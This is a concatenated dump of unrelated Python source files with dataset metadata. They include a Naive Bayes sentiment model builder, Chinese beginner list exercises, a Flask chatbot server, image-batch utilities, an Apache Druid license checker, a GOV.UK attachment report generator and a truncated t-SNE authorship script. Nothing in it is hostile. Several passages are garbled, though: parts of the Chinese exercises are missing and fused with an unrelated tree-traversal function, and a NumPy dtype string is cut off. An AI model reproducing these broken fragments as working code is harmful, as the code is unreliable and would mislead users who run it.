--------------------- Update stopword.txt ---------------------\n# # We try to remove none english word, random typing and all the numbers with low probility\n# english_check = enchant.Dict(\"en_US\")\n\n# for x in tokenlize_list:\n# if not english_check.check(x):\n# remove_list.append(x)\n\n# # Load remove_list to a temp file\n# with open('remove.txt', 'a') as remove2:\n# for item in remove_list:\n# try:\n# remove2.write(\"%s\\n\" % item)\n# except:\n# pass\n# remove2.close()\n# # ---------------------------------------------------------------\n\n# ------ Compute conditional probility with smooth of 1 ---------\nwordsCount = 1\n\nwith open('Demo/model.txt', 'w') as model:\n for x in range(0, len(tokenlize_list_positive)):\n # Word only in positive reviews but not in negative reviews\n if tokenlize_list_positive[x] not in tokenlize_list_negative:\n prob_positive : float = 0.0\n prob_negative : float = 0.0\n\n prob_positive = (frequency_p[x] + 1)/(totalPositiveNum + len(tokenlize_list))\n prob_negative = 1/(totalNegativeNum + len(tokenlize_list))\n \n try:\n model.write(\"No.%d %s\\n\" % (wordsCount,tokenlize_list_positive[x]))\n model.write(str(frequency_p[x]) + \", \" + str(prob_positive) + \", \" + \n str(0) + \", \" + str(prob_negative) + \"\\n\")\n wordsCount += 1\n except:\n pass\n \n for y in range(0, len(tokenlize_list_negative)):\n # Word only in negative reviews but not in positive reviews\n if tokenlize_list_negative[y] not in tokenlize_list_positive:\n prob_positive : float = 0.0\n prob_negative : float = 0.0\n\n prob_positive = 1/(totalPositiveNum + len(tokenlize_list))\n prob_negative = (frequency_n[y] + 1)/(totalNegativeNum + len(tokenlize_list))\n \n try:\n model.write(\"No.%d %s\\n\" % (wordsCount,tokenlize_list_negative[y]))\n model.write(str(0) + \", \" + str(prob_positive) + \", \" + \n str(frequency_n[y]) + \", \" + str(prob_negative) + \"\\n\")\n wordsCount += 1\n except:\n pass\n\n for x in range(0, len(tokenlize_list_positive)):\n for y in range(0, len(tokenlize_list_negative)):\n # Word both have in positive reviews and negative reviews\n if tokenlize_list_positive[x] == tokenlize_list_negative[y]:\n prob_positive : float = 0.0\n prob_negative : float = 0.0\n\n prob_positive = (frequency_p[x] + 1)/(totalPositiveNum + len(tokenlize_list))\n prob_negative = (frequency_n[y] + 1)/(totalNegativeNum + len(tokenlize_list))\n \n model.write(\"No.%d %s\\n\" % (wordsCount,tokenlize_list_positive[x]))\n model.write(str(frequency_p[x]) + \", \" + str(prob_positive) + \", \" + \n str(frequency_n[y]) + \", \" + str(prob_negative) + \"\\n\")\n wordsCount += 1\n\n model.close()\n# ---------------------------------------------------------------","sub_path":"Demo/BuildModel.py","file_name":"BuildModel.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83869286","text":"# 1.# 请用索引取出下面list的指定元素,遍历所有元素\n# # -*- coding: utf-8 -*-\ndef que1():\n L = [\n ['Apple', 'Google', 'Microsoft'],\n ['Java', 'Python', 'Ruby', 'PHP'],\n ['Adam', 'Bart', 'Lisa']]\n print(L[1][1])\n # for i in L:\n # # print(i)\n # for j in i:\n # print(j)\n\n for i in range(len(L)):\n # print(L[i])\n for j in range(len(L[i])):\n print(L[i][j])\n\n\n\n#\n# 2.\n# 将数组逆序输出(不是按大小,就是元素顺序逆序),使用两种方式。\na=[1,3,4,5,6,-1]\n# 方式一\n# a.reverse()\n# print(a)\n\n# 方式二\n# print(a[::-1])\n\n# 方式三 append\na_new=[]\n# for i in range(len(a)):\n# a_new.append(a[-1-i])\n# print(a_new)\n\n# for i in a:\n# a_new.append(a.pop())\n# print(a_new)\n\n\n# 方式四 insert\n# for i in a:\n# a_new.insert(0,i)\n# print(a_new)\n\n\n# 方式五:\n# a=[1,3,4,5,6,-1]\n# for i in range(int(len(a)/2)):\n# a[i],a[-1-i]=a[-1-i],a[i]\n# print(a)\n#\n# a_new=[]\n# for i in reversed(a):\n# a_new.append(i)\n# print(a_new)\n\n\n#\n#\n#\n# 3.\n# 输入某年某月���日,判断这一天是这一年的第几天?\n# 程序分析:以3月5日为例,应该先把前两个月的加起来,然后再加上5天即本年的第几天,特殊情况,闰年且输入月份大于2时需考虑多加一天:\n# 思路\n# 2018 - 8 - 23\n# days = 7\n# 月之前一共有多少天\n# days + 23\n#\n# 闰年:能够被4整除同时不能被100整除的年份,或者是能够被400整除\ndef que2():\n year=int(input(\"请输入年\"))\n month=int(input(\"请输入月\"))\n day=int(input(\"请输入日\"))\n months=[0,31,28,31,30,31,30,31,31,30,31,30,31]\n\n s=0\n if 02 and (year%4==0 and year %100!=0 or year%400==0):\n s+=1\n print(\"当前是今年的第{}天\".format(s))\n\n\n\n#\n# 4.\n# 求列表li = [1, 4, -5, 9, -6]\n# 的最大值与最小值,和与平均值。\nli = [1, 4, -5, 9, -6]\n# 思路:先取出一个值 就假设成最大值或者最小值,遍历列表跟所有元素比较,\n# 如果max<列表中的值,那么是真正的最大值,\n# 同样最小值也是\ndef que4():\n max=min=li[0]\n sums=0\n for i in li:\n if i>max:\n max=i\n if i 0:\n node,level = to_visit.pop(0)\n for child in node.children:\n to_visit.append([child,level+1])\n if max_height < level+1:\n max_height = level+1 \n \n return max_height\n","sub_path":"Python/559_01.py","file_name":"559_01.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522670527","text":"#!/usr/bin/env python3\nimport logging\nimport os\nimport threading\nimport time\n\nfrom werkzeug.contrib.profiler import ProfilerMiddleware\n\nfrom chatbot.analytics import start_batch_sender\nfrom chatbot.channels import google_chat_api\nfrom chatbot.config import CONF\nfrom chatbot.nlp_models import dialog\n\nlogger = logging.getLogger(__name__)\n\n\ndef _warmup():\n # Run loading get_agent in a loop to avoid having Heroku sleep\n # the process.\n def background_task():\n while 1:\n logger.debug(\"loading agent ...\")\n dialog.get_agent()\n\n interval = int(CONF.get_value('warming-up-agent-interval'))\n time.sleep(interval)\n t = threading.Thread(target=background_task)\n t.daemon = True\n t.start()\n\n\n_warmup()\nstart_batch_sender()\napp = google_chat_api.app\nif os.getenv('FLASK_PROFILE'):\n app.config['PROFILE'] = True\n app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[30])\n\n\ndef run():\n port = os.environ.get('PORT', 8080)\n app.run(port=port, debug=True)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"chatbot/cli/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439254037","text":"# Made by Pedro Goncalves Mokarzel\n# while attending UW Bothell Student ID# 1576696\n# Made in 12/09/2019\n# Based on instruction in CSS 490, \n# taught by professor Dong Si\n\nfrom glob import glob\nfrom sklearn.model_selection import train_test_split \nimport numpy as np # Installed on DAIS 1\n\nfrom PIL import Image # Installed on DAIS 1\nfrom matplotlib import pyplot as plt # Installed on DAIS 1\n\n\n\n# Precondition: file name, size of batch to process, and path of output txt file, the top quantity for\n# both input and output, title for images\n# Postcondition: saves info to txt file\n# Saves the batch size\n# the data created for creating images and the one for just reading,\n# and validation\ndef create_names_with_batch(filePath, batch_size, save_info_path, quantity, title = ''):\n array = glob(filePath + '/*.flt')\n validate, test = train_test_split(array[0: quantity], test_size = 0.9)\n t1,t2 = train_test_split(test, test_size = 0.5)\n outFile = open(save_info_path + '/'+title+'trainning_data_b%d.txt'%(batch_size),\"a\")\n out_validate = open(save_info_path + '/'+title+'validate_data_b%d.txt'%(batch_size),\"a\")\n \n\n outFile.write((str)(batch_size) +'\\n')\n out_validate.write((str)(batch_size) +'\\n')\n # create validation data\n for k in range(0, len(validate)):\n out_validate.write(validate[k] + '\\n')\n out_validate.close()\n\n #Splits data at proper size\n true_size = len(t1)\n if(len(t1)>len(t2)):\n true_size = len(t2)\n true_size = true_size - (true_size%batch_size)\n # Saves info to outfile\n for i in range(0, true_size):\n outFile.write(t1[i] + '\\n')\n #Midpoint stop\n outFile.write('~\\n')\n \n for j in range(0,true_size):\n outFile.write(t2[j] + '\\n')\n outFile.close()\n # return x1,x2\n\n# Loads the names used for trainning in the batch formation specified by the txt file generated\n# from create_names_with_batch\n# Precondition: file for input\n# Postcondition: array with names of images to be processed\ndef load_train_text_names(file_path_in):\n outFile = open(file_path_in,\"r\")\n processing_batch = outFile.readline()\n processing_batch = processing_batch.replace('\\n','')\n processing_batch = int(processing_batch)\n arr1 = []\n arr2 = []\n arr1_t = []\n temp = outFile.readline()\n counter = 0\n # Reads until stop\n while temp !='~\\n': \n arr1_t.append(temp.replace('\\n',''))\n counter+=1\n temp = outFile.readline()\n if(counter == processing_batch):\n counter = 0\n arr1.append(arr1_t)\n del arr1_t\n arr1_t = []\n\n temp = outFile.readline()\n # Reads until end\n while temp:\n arr2.append(temp.replace('\\n','')) \n temp = outFile.readline()\n outFile.close()\n arr1 = np.asarray(arr1)\n arr2 = np.asarray(arr2)\n arr2 = arr2.reshape((-1,processing_batch))\n return arr1, arr2\n\n# Precondition: file of input to load variables from\n# Postcondition: array with variable giiven names to read\ndef load_validation_text_names(file_path_in):\n outFile = open(file_path_in,\"r\")\n processing_batch = outFile.readline()\n processing_batch = processing_batch.replace('\\n','')\n processing_batch = int(processing_batch)\n arr = []\n # Start iteration\n temp = outFile.readline()\n while temp:\n arr.append(temp.replace('\\n','')) \n temp = outFile.readline()\n outFile.close()\n arr = np.asarray(arr)\n arr = arr.reshape((-1,processing_batch))\n return arr\n\n# Precondition: file name to print array, and array of longs to be printed\n# Postcondition: Image save in file path\n# Based on 'Medical Imaging 2019: Physics of Medical Imaging' utils method I worked with during summer research with Professor Si\n# save_image method\ndef save_image(filePath, image):\n image.tofile(filePath + '.flt')\n\n scalef = np.amax(image)\n print_img = np.clip(255 * image/scalef, 0, 255).astype('uint8')\n print_img = np.squeeze(print_img)\n im = Image.fromarray(print_img.astype('uint8')).convert('L')\n im.save(filePath+'.png', 'png')\n\n# Precondition: name of file of image\n# Postcondition: array based on image\n# Based on 'Medical Imaging 2019: Physics of Medical Imaging' utils method I worked with during summer research with Professor Si\n# load_float method\ndef load_float(fileName):\n float_arr= np.fromfile(fileName, dtype= ' h2_start -> project_dependencies_start -> h3_start -> compile_start -> table_start -> row_start -> th_start / td_start -> th_end / td_end -> row_end -> table_end -> compile_end -> h3_end -> project_dependencies_end -> h2_end -> none\n\n attr_index = 0\n group_id = None\n artifact_id = None\n version = None\n classifier = None\n dep_type = None\n license = None\n state = \"none\"\n dep_to_license = None\n compatible_license_names = None\n include_classifier = False\n druid_module_name = None\n\n def __init__(self, druid_module_name, compatible_license_names):\n HTMLParser.__init__(self)\n self.state = \"none\"\n self.druid_module_name = druid_module_name\n self.compatible_license_names = compatible_license_names\n\n def parse(self, f):\n self.dep_to_license = {}\n self.feed(f.read())\n return self.dep_to_license\n\n def handle_starttag(self, tag, attrs):\n # print(\"current: {}, start tag: {}, attrs:{} \".format(self.state, tag, attrs))\n if self.state == \"none\":\n if tag == \"h2\":\n self.state = \"h2_start\"\n\n if self.state == \"h2_start\":\n if tag == \"a\":\n for attr in attrs:\n if attr[0] == \"name\" and (attr[1] == \"Project_Dependencies\" or attr[1] == \"Project_Transitive_Dependencies\"):\n self.state = \"project_dependencies_start\"\n self.include_classifier = False\n\n if self.state == \"h2_end\":\n if tag == \"h3\":\n self.state = \"h3_start\"\n\n if self.state == \"h3_start\":\n if tag == \"a\":\n for attr in attrs:\n if attr[0] == \"name\" and attr[1] == \"compile\":\n self.state = \"compile_start\"\n\n if self.state == \"h3_end\":\n if tag == \"table\":\n self.state = \"table_start\"\n\n if self.state == \"table_start\":\n if tag == \"tr\":\n self.state = \"row_start\"\n self.clear_attr()\n\n if self.state == \"row_end\":\n if tag == \"tr\":\n self.state = \"row_start\"\n self.clear_attr()\n\n if self.state == \"row_start\":\n if tag == \"td\":\n self.state = \"td_start\"\n elif tag == \"th\":\n self.state = \"th_start\"\n\n if self.state == \"th_end\":\n if tag == \"th\":\n self.state = \"th_start\"\n\n if self.state == \"td_end\":\n if tag == \"td\":\n self.state = \"td_start\"\n\n def handle_endtag(self, tag):\n # print(\"current: {}, end tag: {}\".format(self.state, tag))\n if self.state == \"project_dependencies_start\":\n if tag == \"a\":\n self.state = \"project_dependencies_end\"\n\n if self.state == \"h2_start\":\n if tag == \"h2\":\n self.state = \"h2_end\"\n\n if self.state == \"project_dependencies_end\":\n if tag == \"h2\":\n self.state = \"h2_end\"\n\n if self.state == \"compile_start\":\n if tag == \"a\":\n self.state = \"compile_end\"\n\n if self.state == \"compile_end\":\n if tag == \"h3\":\n self.state = \"h3_end\"\n\n if self.state == \"table_start\":\n if tag == \"table\":\n self.state = \"none\"\n\n if self.state == \"td_start\":\n if tag == \"td\":\n self.state = \"td_end\"\n self.attr_index = self.attr_index + 1\n\n if self.state == \"th_start\":\n if tag == \"th\":\n self.state = \"th_end\"\n\n if self.state == \"row_start\":\n if tag == \"tr\":\n self.state = \"row_end\"\n\n if self.state == \"th_end\":\n if tag == \"tr\":\n self.state = \"row_end\"\n\n if self.state == \"td_end\":\n if tag == \"tr\":\n self.state = \"row_end\"\n # print(json.dumps({\"groupId\": self.group_id, \"artifactId\": self.artifact_id, \"version\": self.version, \"classifier\": self.classifier, \"type\": self.dep_type, \"license\": self.license}))\n if self.group_id.find(\"org.apache.druid\") < 0:\n self.dep_to_license[get_dep_key(self.group_id, self.artifact_id, self.version)] = (self.license, self.druid_module_name)\n\n if self.state == \"row_end\":\n if tag == \"table\":\n self.state = \"none\"\n\n def handle_data(self, data):\n if self.state == \"td_start\":\n self.set_attr(data)\n elif self.state == \"th_start\":\n if data.lower() == \"classifier\":\n self.include_classifier = True\n\n def clear_attr(self):\n self.group_id = None\n self.artifact_id = None\n self.version = None\n self.classifier = None\n self.dep_type = None\n self.license = None\n self.attr_index = 0\n\n def set_attr(self, data):\n #print(\"set data: {}\".format(data))\n if self.attr_index == 0:\n self.group_id = data\n elif self.attr_index == 1:\n self.artifact_id = data\n elif self.attr_index == 2:\n self.version = get_version_string(data)\n elif self.attr_index == 3:\n if self.include_classifier:\n self.classifier = data\n else:\n self.dep_type = data\n elif self.attr_index == 4:\n if self.include_classifier:\n self.dep_type = data\n else:\n self.set_license(data)\n elif self.attr_index == 5:\n if self.include_classifier:\n self.set_license(data)\n else:\n raise Exception(\"Unknown attr_index [{}]\".format(self.attr_index))\n else:\n raise Exception(\"Unknown attr_index [{}]\".format(self.attr_index))\n\n def set_license(self, data):\n if data.upper().find(\"GPL\") < 0:\n if self.license != 'Apache License version 2.0':\n self.license = self.compatible_license_names[data]\n\n\ndef print_log_to_stderr(string):\n print(string, file=sys.stderr)\n\ndef build_compatible_license_names():\n compatible_licenses = {}\n compatible_licenses['Apache License, Version 2.0'] = 'Apache License version 2.0'\n compatible_licenses['The Apache Software License, Version 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache-2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache 2'] = 'Apache License version 2.0'\n compatible_licenses['Apache License 2'] = 'Apache License version 2.0'\n compatible_licenses['Apache License 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache Software License - Version 2.0'] = 'Apache License version 2.0'\n compatible_licenses['The Apache License, Version 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache License version 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache License Version 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache License Version 2'] = 'Apache License version 2.0'\n compatible_licenses['Apache License v2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache License, 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache License, version 2.0'] = 'Apache License version 2.0'\n compatible_licenses['Apache 2.0 License'] = 'Apache License version 2.0'\n compatible_licenses['Apache License, 2.0'] = 'Apache License version 2.0'\n\n compatible_licenses['Public Domain'] = 'Public Domain'\n\n compatible_licenses['BSD-2-Clause License'] = 'BSD-2-Clause License'\n compatible_licenses['BSD-2-Clause'] = 'BSD-2-Clause License'\n compatible_licenses['BSD 2-Clause license'] = 'BSD-2-Clause License'\n compatible_licenses['BSD 2-Clause License'] = 'BSD-2-Clause License'\n\n compatible_licenses['BSD-3-Clause License'] = 'BSD-3-Clause License'\n compatible_licenses['New BSD license'] = 'BSD-3-Clause License'\n compatible_licenses['BSD'] = 'BSD-3-Clause License'\n compatible_licenses['The BSD License'] = 'BSD-3-Clause License'\n compatible_licenses['BSD licence'] = 'BSD-3-Clause License'\n compatible_licenses['BSD License'] = 'BSD-3-Clause License'\n compatible_licenses['BSD-like'] = 'BSD-3-Clause License'\n compatible_licenses['BSD 3-clause'] = 'BSD-3-Clause License'\n compatible_licenses['The BSD 3-Clause License'] = 'BSD-3-Clause License'\n compatible_licenses['Revised BSD'] = 'BSD-3-Clause License'\n compatible_licenses['New BSD License'] = 'BSD-3-Clause License'\n compatible_licenses['3-Clause BSD License'] = 'BSD-3-Clause License'\n compatible_licenses['BSD 3-Clause'] = 'BSD-3-Clause License'\n compatible_licenses['BSD-3-Clause'] = 'BSD-3-Clause License'\n\n compatible_licenses['Unicode/ICU License'] = 'Unicode/ICU License'\n\n compatible_licenses['SIL Open Font License 1.1'] = 'SIL Open Font License 1.1'\n\n compatible_licenses['CDDL 1.1'] = 'CDDL 1.1'\n compatible_licenses['CDDL/GPLv2+CE'] = 'CDDL 1.1'\n compatible_licenses['CDDL + GPLv2 with classpath exception'] = 'CDDL 1.1'\n compatible_licenses['CDDL License'] = 'CDDL 1.1'\n compatible_licenses['COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0'] = 'CDDL 1.0'\n\n compatible_licenses['Eclipse Public License 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['The Eclipse Public License, Version 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['Eclipse Public License - Version 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['Eclipse Public License, Version 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['Eclipse Public License v1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['EPL 1.0'] = 'Eclipse Public License 1.0'\n\n compatible_licenses['Eclipse Public License 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['The Eclipse Public License, Version 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['Eclipse Public License - Version 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['Eclipse Public License, Version 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['Eclipse Public License v2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['EPL 2.0'] = 'Eclipse Public License 2.0'\n\n compatible_licenses['Eclipse Distribution License 1.0'] = 'Eclipse Distribution License 1.0'\n compatible_licenses['Eclipse Distribution License - v 1.0'] = 'Eclipse Distribution License 1.0'\n compatible_licenses['Eclipse Distribution License v. 1.0'] = 'Eclipse Distribution License 1.0'\n compatible_licenses['EDL 1.0'] = 'Eclipse Distribution License 1.0'\n\n compatible_licenses['Mozilla Public License Version 2.0'] = 'Mozilla Public License Version 2.0'\n compatible_licenses['Mozilla Public License, Version 2.0'] = 'Mozilla Public License Version 2.0'\n\n compatible_licenses['Creative Commons Attribution 2.5'] = 'Creative Commons Attribution 2.5'\n\n compatible_licenses['Creative Commons CC0'] = 'Creative Commons CC0'\n compatible_licenses['CC0'] = 'Creative Commons CC0'\n\n compatible_licenses['The MIT License'] = 'MIT License'\n compatible_licenses['MIT License'] = 'MIT License'\n compatible_licenses['The MIT License (MIT)'] = 'MIT License'\n compatible_licenses['Bouncy Castle Licence'] = 'MIT License'\n compatible_licenses['SPDX-License-Identifier: MIT'] = 'MIT License'\n\n compatible_licenses['The Go license'] = 'The Go license'\n\n compatible_licenses['-'] = '-'\n return compatible_licenses\n\ndef get_dep_key(group_id, artifact_id, version):\n return (group_id, artifact_id, version)\n\ndef get_version_string(version):\n if type(version) == str:\n return version\n else:\n return str(version)\n\ndef find_druid_module_name(dirpath):\n ext_start = dirpath.find(\"/ext/\")\n if ext_start > 0:\n # Found an extension\n subpath = dirpath[(len(\"/ext/\") + ext_start):]\n ext_name_end = subpath.find(\"/\")\n if ext_name_end < 0:\n raise Exception(\"Can't determine extension name from [{}]\".format(dirpath))\n else:\n return subpath[0:ext_name_end]\n else:\n # Druid core\n return \"core\"\n\ndef check_licenses(license_yaml, dependency_reports_root):\n # Build a dictionary to facilitate comparing reported licenses and registered ones.\n # These dictionaries are the mapping of (group_id, artifact_id, version) to license_name.\n\n # Build reported license dictionary.\n reported_dep_to_licenses = {}\n compatible_license_names = build_compatible_license_names()\n for dirpath, dirnames, filenames in os.walk(dependency_reports_root):\n for filename in filenames:\n if filename == \"dependencies.html\":\n full_path = os.path.join(dirpath, filename)\n # Determine if it's druid core or an extension\n druid_module_name = find_druid_module_name(dirpath)\n print_log_to_stderr(\"Parsing {}\".format(full_path))\n with open(full_path, encoding=\"utf-8\") as report_file:\n parser = DependencyReportParser(druid_module_name, compatible_license_names)\n reported_dep_to_licenses.update(parser.parse(report_file))\n\n if len(reported_dep_to_licenses) == 0:\n raise Exception(\"No dependency reports are found\")\n\n print_log_to_stderr(\"Found {} reported licenses\\n\".format(len(reported_dep_to_licenses)))\n\n # Build registered license dictionary.\n registered_dep_to_licenses = {}\n skipping_licenses = {}\n with open(license_yaml, encoding='utf-8') as registry_file:\n licenses_list = list(yaml.load_all(registry_file, Loader=yaml.FullLoader))\n for license in licenses_list:\n if 'libraries' in license:\n for library in license['libraries']:\n if type(library) is not dict:\n raise Exception(\"Expected dict but got {}[{}]\".format(type(library), library))\n if len(library) > 1:\n raise Exception(\"Expected 1 groupId and artifactId, but got [{}]\".format(library))\n for group_id, artifact_id in library.items():\n if 'version' not in license:\n raise Exception(\"version is missing in {}\".format(license))\n if 'license_name' not in license:\n raise Exception(\"name is missing in {}\".format(license))\n if 'skip_dependency_report_check' in license and license['skip_dependency_report_check']:\n if 'version' not in license:\n version = \"-\"\n else:\n version = get_version_string(license['version'])\n skipping_licenses[get_dep_key(group_id, artifact_id, version)] = license\n else:\n registered_dep_to_licenses[get_dep_key(group_id, artifact_id, get_version_string(license['version']))] = compatible_license_names[license['license_name']]\n\n if len(registered_dep_to_licenses) == 0:\n raise Exception(\"No registered licenses are found\")\n\n # Compare licenses in registry and those in dependency reports.\n mismatched_licenses = []\n missing_licenses = []\n unchecked_licenses = []\n # Iterate through registered licenses and check if its license is same with the reported one.\n for key, registered_license in registered_dep_to_licenses.items():\n if key in reported_dep_to_licenses: # key is (group_id, artifact_id, version)\n reported_license_druid_module = reported_dep_to_licenses[key]\n reported_license = reported_license_druid_module[0]\n druid_module = reported_license_druid_module[1]\n if reported_license is not None and reported_license != \"-\" and reported_license != registered_license:\n group_id = key[0]\n artifact_id = key[1]\n version = key[2]\n mismatched_licenses.append((druid_module, group_id, artifact_id, version, reported_license, registered_license))\n\n # If we find any mismatched license, stop immediately.\n if len(mismatched_licenses) > 0:\n print_log_to_stderr(\"Error: found {} mismatches between reported licenses and registered licenses\".format(len(mismatched_licenses)))\n for mismatched_license in mismatched_licenses:\n print_log_to_stderr(\"druid_module: {}, groupId: {}, artifactId: {}, version: {}, reported_license: {}, registered_license: {}\".format(mismatched_license[0], mismatched_license[1], mismatched_license[2], mismatched_license[3], mismatched_license[4], mismatched_license[5]))\n print_log_to_stderr(\"\")\n\n # Let's find missing licenses, which are reported but missing in the registry.\n for key, reported_license_druid_module in reported_dep_to_licenses.items():\n if reported_license_druid_module[0] != \"-\" and key not in registered_dep_to_licenses and key not in skipping_licenses:\n missing_licenses.append((reported_license_druid_module[1], key[0], key[1], key[2], reported_license_druid_module[0]))\n\n if len(missing_licenses) > 0:\n print_log_to_stderr(\"Error: found {} missing licenses. These licenses are reported, but missing in the registry\".format(len(missing_licenses)))\n for missing_license in missing_licenses:\n print_log_to_stderr(\"druid_module: {}, groupId: {}, artifactId: {}, version: {}, license: {}\".format(missing_license[0], missing_license[1], missing_license[2], missing_license[3], missing_license[4]))\n print_log_to_stderr(\"\")\n\n # Let's find unchecked licenses, which are registered but missing in the report.\n # These licenses should be checked manually.\n for key, registered_license in registered_dep_to_licenses.items():\n if key not in reported_dep_to_licenses:\n unchecked_licenses.append((key[0], key[1], key[2], registered_license))\n elif reported_dep_to_licenses[key][0] == \"-\":\n unchecked_licenses.append((key[0], key[1], key[2], registered_license))\n\n if len(unchecked_licenses) > 0:\n print_log_to_stderr(\"Warn: found {} unchecked licenses. These licenses are registered, but not found in dependency reports.\".format(len(unchecked_licenses)))\n print_log_to_stderr(\"These licenses must be checked manually.\")\n for unchecked_license in unchecked_licenses:\n print_log_to_stderr(\"groupId: {}, artifactId: {}, version: {}, reported_license: {}\".format(unchecked_license[0], unchecked_license[1], unchecked_license[2], unchecked_license[3]))\n print_log_to_stderr(\"\")\n\n if len(mismatched_licenses) > 0 or len(missing_licenses) > 0:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n try:\n parser = argparse.ArgumentParser(description='Check and generate license file.')\n parser.add_argument('license_yaml', metavar='', type=str)\n parser.add_argument('dependency_reports_root', metavar='', type=str)\n args = parser.parse_args()\n\n license_yaml = args.license_yaml\n dependency_reports_root = args.dependency_reports_root\n check_licenses(license_yaml, dependency_reports_root)\n\n except KeyboardInterrupt:\n print('Interrupted, closing.')\n","sub_path":"distribution/bin/check-licenses.py","file_name":"check-licenses.py","file_ext":"py","file_size_in_byte":20697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"98549243","text":"from src.report_generators.base_report_generator import BaseReportGenerator\nfrom src.helpers.preprocess_text import extract_subtext, extract_from_path\nfrom src.utils.constants import ATTACHMENTS\n\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\n\n\nclass AttachmentTypeReportGenerator(BaseReportGenerator):\n @property\n def headers(self):\n return [\"base_path\",\n \"primary_publishing_organisation\",\n \"publishing_app\",\n \"document_type\",\n \"first_published_at\",\n \"attachment_and_count\"]\n\n @property\n def filename(self):\n return \"attachment_type_report.csv\"\n\n def process_page(self, content_item, html):\n # ignore empty details\n if not content_item['details']:\n return []\n\n # extract primary publishing organisations\n content_item['primary_publishing_organisation'] = extract_subtext(text=content_item['organisations'],\n key='primary_publishing_organisation',\n index=1)\n # extract attachment url\n content_item['attachment_and_count'] = self.count_attachment_from_html(text=content_item['details'])\n\n # return only pages with valid attachment extensions\n if not content_item['attachment_and_count']:\n return []\n else:\n return [content_item['base_path'],\n content_item['primary_publishing_organisation'],\n content_item['publishing_app'],\n content_item['document_type'],\n content_item['first_published_at'],\n content_item['attachment_and_count']]\n\n @staticmethod\n def count_attachment_from_html(text: str) -> dict:\n \"\"\"\n Extracts attachments as identified by links from a GOV.UK webpage via looking at href tags.\n Very similar to extract_links_from_html() but returns more results.\n Example: government/publications/measles-mumps-and-rubella-lab-confirmed-cases-in-england-2019\n Reference:\n - `src/helpers/prepreprocess_text/py`\n\n :param text: String of the HTML code to extract attachments from.\n :return: Dictionary of count of attachment extensions.\n \"\"\"\n try:\n soup = BeautifulSoup(text, 'html5lib')\n links = [link.get('href') for link in soup.find_all(name='a', href=True)]\n # extract extension\n attachments = extract_from_path(data=links, part='ext')\n # take valid attachments only\n attachments = [x for x in attachments if x in ATTACHMENTS]\n # take unique html attachments\n attachments_html = [html for html in links if html.startswith('/')]\n attachments_html = list(set(attachments_html))\n # count repeated attachment elements in list\n attachment_counts = dict(Counter(attachments))\n # add html counts\n html_count = len(attachments_html)\n # cast 0s to None to be consistent with other attachments\n if html_count == 0:\n html_count = None\n\n attachment_counts.update({'.html': html_count})\n\n return attachment_counts\n\n except Exception as e:\n print(\"error @count_attachment_from_html\", e)\n","sub_path":"src/report_generators/attachment_type_report_generator.py","file_name":"attachment_type_report_generator.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585383989","text":"from ..constants import dbengine, outputdir\nfrom ..log_setup import setup_logging\nfrom .compute_features import count_dicts_to_sparse, count_char_ngrams, spacy_parse_docs\nfrom .ngram import NGramCounter\nfrom MulticoreTSNE import MulticoreTSNE as TSNE\nfrom scipy.sparse import csr_matrix\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.decomposition.pca import PCA\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import classification_report, accuracy_score, f1_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport argparse\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport scipy.sparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nlogger = setup_logging(__name__, mode='a', level=logging.DEBUG)\n\ndef visualize_tsne(embedding, authors):\n # TODO d3.js vis where you can pick authors to highlight\n # unpicked authors are gray dots\n authors = np.array(authors)\n u_authors = np.sort(np.unique(authors))\n author_inds = []\n for a in u_authors:\n author_inds.append(np.argwhere(authors == a))\n\n markers = ['o', '^', 's', 'x', '*'] * 2\n colors = sns.hls_palette(10, l=.6, s=.5)\n\n for inds, author, marker, color in zip(author_inds, u_authors, markers, colors):\n sample = np.random.choice(inds.flatten(), min(len(inds), 2000), replace=False)\n plt.scatter(embedding[sample, 0],\n embedding[sample, 1],\n label=author,\n marker=marker,\n color=color,\n alpha=.3)\n\n plt.gca().set_xticks([])\n plt.gca().set_yticks([])\n plt.legend()\n return plt.gcf()\n\ndef compare_authors(x1, x2, set1_inds, set2_inds, set3_inds, set1_label, set2_label, set3_label):\n \"\"\"Takes three sets of documents 